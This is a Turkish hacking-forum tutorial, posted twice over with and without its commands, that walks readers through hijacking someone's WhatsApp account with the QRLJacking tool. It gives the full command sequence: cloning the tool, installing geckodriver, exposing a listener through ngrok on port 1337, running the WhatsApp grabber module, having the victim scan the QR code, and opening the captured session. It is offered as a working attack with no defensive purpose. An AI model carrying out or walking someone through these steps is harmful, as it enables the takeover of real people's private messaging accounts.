Merhabalar TürkHackTeam ailesi, bugün sizlere "WhatsApp Hacking" konusunu anlatacağım. Bu Parrot'da çalışmadı Kali'de deneyiniz! Konu da bir bölüm sonrasında fotoğraflarda arkaplan değişik olduğunu göreceksiniz onlar By Ghost'a aittir. Teşekkürler dostum )
Konu Başlıkları
QRLJacking Nedir?
Birlikte WhatsApp Hack'leyelim!
QRLJacking Nedir?
QRLJacking aracı QR kodu ile giriş yapılan sosyal medya hesaplarını ele geçirmek için üretilmiş sosyal mühendislik aracıdır.
Birlikte WhatsApp Hack'leyelim!
Öncelikle GitHub adresine gidelim. https://github.com/OWASP/QRLJacking URL'yi kopyalayalım.
Ardından terminali açalım ve masaüstüne gelelim bunun için
yazalım ardından aracı indirmek
yazalım.
Ardından Selenium için gerekli olan geckodriver'ı indireceğiz bunun için de buraya https://github.com/mozilla/geckodriver/releases gidelim ve linux'unuz hangi sürümse ona uygun olanı indirelim.
Ardından .zip dosyasından dosyayı çıkaralım. İlk olarak
dizinine kopyalayalım. Ardından
kısımlarına kopyalayıp terminali kapatalım.
Ardından local servisimizi dış ağda kullanmak için Ngrok'u indireceğiz. Bunun için de sitesine gidelim https://ngrok.com.
Kayıt olun ve size uygun sürümü indiriniz.
Daha sonra ngrok dosyasını çıkartın ve
dizinine atınız. Ardından root dizinine giriş yapıp dosyaya yetki veriniz
. Sonra
dizinine ngrok dosyasını kopyalayalım ve işlemi bitirelim.
Kayıt olduğumuzda bizlere bir key verdi onu aktif hale getirmek için
şeklinde yazınız.
Ardından masaüstüne gelerek
yazalım, tekrardan
yazalım ve en son olarakta
yazalım.
yazdığımız da bizlere komutlarını göstermektedir.
Daha sonra
diyerek exploit'i görelim. Bunu kullanmak için
yazalım ve
diyerek ayarlarına bakalım. Burada port'u ve host'u ayarlayacağız bunun için de
yazalım
Başka bir terminal açarak
yazalımç
Gördüğünüz gibi ağı açtı ve dinliyoruz.
QRLJacker'a gelerek
diyelim.
QR kodu oluşturdu.
Ngrok terminaline gelerek altta beyaz olarak aldığım linke tıklayarak tarayıcıda açalım.
Bizlere QR kod verdi gördüğünüz gibi. Bunu karşı tarafın telefonunda okutturalım.
Gördüğünüz gibi oturum açıldı diyor bizlere ve
yazdığımız da Firefox'u açarak WhatsApp'a giriş yapacak.
Gördüğünüz gibi açıldı.
Konum bu kadardı arkadaşlar, buradan tekrardan By Ghost'a teşekkür ediyorum )
Konu Başlıkları
QRLJacking Nedir?
Birlikte WhatsApp Hack'leyelim!
QRLJacking Nedir?
QRLJacking aracı QR kodu ile giriş yapılan sosyal medya hesaplarını ele geçirmek için üretilmiş sosyal mühendislik aracıdır.
Birlikte WhatsApp Hack'leyelim!
Öncelikle GitHub adresine gidelim. https://github.com/OWASP/QRLJacking URL'yi kopyalayalım.
Ardından terminali açalım ve masaüstüne gelelim bunun için
Kod:
cd Desktop
Kod:
git clone https://github.com/OWASP/QRLJacking
Ardından Selenium için gerekli olan geckodriver'ı indireceğiz bunun için de buraya https://github.com/mozilla/geckodriver/releases gidelim ve linux'unuz hangi sürümse ona uygun olanı indirelim.
Ardından .zip dosyasından dosyayı çıkaralım. İlk olarak
Kod:
sudo cp geckodriver /usr/local/share/
Kod:
sudo cp geckodriver /usr/local/bin/
sudo cp geckodriver /usr/bin/
Ardından local servisimizi dış ağda kullanmak için Ngrok'u indireceğiz. Bunun için de sitesine gidelim https://ngrok.com.
Kayıt olun ve size uygun sürümü indiriniz.
Daha sonra ngrok dosyasını çıkartın ve
Kod:
sudo mv ngrok /root
Kod:
chmod +x ngrok
Kod:
cp ngrok /usr/bin/
Kayıt olduğumuzda bizlere bir key verdi onu aktif hale getirmek için
Kod:
./ngrok authtoken token'i_yazınız.
Ardından masaüstüne gelerek
Kod:
cd QRLJacking/
Kod:
cd QRLJacker/
Kod:
pip3 install -r requirements.txt[/CODE yazarak kurulumu yapalım.
[IMG]https://resmim.net/f/dfBq4G.jpg[/IMG]
Aracımızı çalıştırmak için [CODE]python3 QrlJacker.py
Kod:
help
Daha sonra
Kod:
show
Kod:
use grabber/whatsapp
Kod:
options
Kod:
set port 1337
set host 0.0.0.0
Başka bir terminal açarak
Kod:
ngrok http 1337
Gördüğünüz gibi ağı açtı ve dinliyoruz.
QRLJacker'a gelerek
Kod:
run
QR kodu oluşturdu.
Ngrok terminaline gelerek altta beyaz olarak aldığım linke tıklayarak tarayıcıda açalım.
Bizlere QR kod verdi gördüğünüz gibi. Bunu karşı tarafın telefonunda okutturalım.
Gördüğünüz gibi oturum açıldı diyor bizlere ve
Kod:
sessions -i 0
Gördüğünüz gibi açıldı.
Konum bu kadardı arkadaşlar, buradan tekrardan By Ghost'a teşekkür ediyorum )
Son düzenleme: